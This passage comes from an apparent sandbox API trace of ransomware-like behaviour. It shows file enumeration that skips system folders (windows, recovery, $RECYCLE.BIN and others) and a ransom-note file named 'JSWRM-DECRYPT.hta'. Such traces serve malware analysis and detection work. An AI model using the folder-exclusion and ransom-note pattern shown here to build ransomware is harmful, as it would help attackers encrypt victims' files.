cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2ssv.dll", lpUsedDefaultChar=0x0) returned 10 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2ssv.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2ssv.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2ssv.dll", lpUsedDefaultChar=0x0) returned 10 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.709] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2d640, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jpeg.dll", cAlternateFileName="")) returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2=".") returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="..") returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="...") returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="windows") returned -1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="recovery") returned -1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="perflogs") returned -1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="documents and settings") returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="system volume information") returned -1 [0069.709] lstrcmpiW (lpString1="jpeg.dll", lpString2="msocache") returned -1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpeg.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpeg.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jpeg.dll", lpUsedDefaultChar=0x0) returned 8 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpeg.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpeg.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jpeg.dll", lpUsedDefaultChar=0x0) returned 8 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.709] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jsdt.dll", cAlternateFileName="")) returned 1 [0069.709] lstrcmpiW (lpString1="jsdt.dll", lpString2=".") returned 1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="..") returned 1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="...") returned 1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="windows") returned -1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="recovery") returned -1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="perflogs") returned -1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="documents and settings") returned 1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="system volume information") returned -1 [0069.710] lstrcmpiW (lpString1="jsdt.dll", lpString2="msocache") returned -1 [0069.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsdt.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsdt.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsdt.dll", lpUsedDefaultChar=0x0) returned 8 [0069.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsdt.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsdt.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsdt.dll", lpUsedDefaultChar=0x0) returned 8 [0069.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.710] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jsound.dll", cAlternateFileName="")) returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2=".") returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="..") returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="...") returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="windows") returned -1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="recovery") returned -1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="perflogs") returned -1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="documents and settings") returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="system volume information") returned -1 [0069.710] lstrcmpiW (lpString1="jsound.dll", lpString2="msocache") returned -1 [0069.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsound.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsound.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsound.dll", lpUsedDefaultChar=0x0) returned 10 [0069.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsound.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsound.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsound.dll", lpUsedDefaultChar=0x0) returned 10 [0069.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.711] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jsoundds.dll", cAlternateFileName="")) returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2=".") returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="..") returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="...") returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="windows") returned -1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="recovery") returned -1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="perflogs") returned -1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="documents and settings") returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="system volume information") returned -1 [0069.711] lstrcmpiW (lpString1="jsoundds.dll", lpString2="msocache") returned -1 [0069.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsoundds.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsoundds.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsoundds.dll", lpUsedDefaultChar=0x0) returned 12 [0069.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsoundds.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jsoundds.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jsoundds.dll", lpUsedDefaultChar=0x0) returned 12 [0069.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.711] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200811e2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x200811e2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.711] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.712] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.712] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.712] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x35e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="kcms.dll", cAlternateFileName="")) returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2=".") returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="..") returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="...") returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="windows") returned -1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="recovery") returned -1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="perflogs") returned -1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="documents and settings") returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="system volume information") returned -1 [0069.712] lstrcmpiW (lpString1="kcms.dll", lpString2="msocache") returned -1 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kcms.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kcms.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kcms.dll", lpUsedDefaultChar=0x0) returned 8 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kcms.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kcms.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kcms.dll", lpUsedDefaultChar=0x0) returned 8 [0069.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.713] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="keytool.exe", cAlternateFileName="")) returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2=".") returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="..") returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="...") returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="windows") returned -1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="recovery") returned -1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="perflogs") returned -1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="documents and settings") returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="system volume information") returned -1 [0069.713] lstrcmpiW (lpString1="keytool.exe", lpString2="msocache") returned -1 [0069.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keytool.exe", lpUsedDefaultChar=0x0) returned 11 [0069.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keytool.exe", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keytool.exe", lpUsedDefaultChar=0x0) returned 11 [0069.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.713] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="kinit.exe", cAlternateFileName="")) returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2=".") returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="..") returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="...") returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="windows") returned -1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="recovery") returned -1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="perflogs") returned -1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="documents and settings") returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="system volume information") returned -1 [0069.713] lstrcmpiW (lpString1="kinit.exe", lpString2="msocache") returned -1 [0069.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kinit.exe", lpUsedDefaultChar=0x0) returned 9 [0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kinit.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kinit.exe", lpUsedDefaultChar=0x0) returned 9 [0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 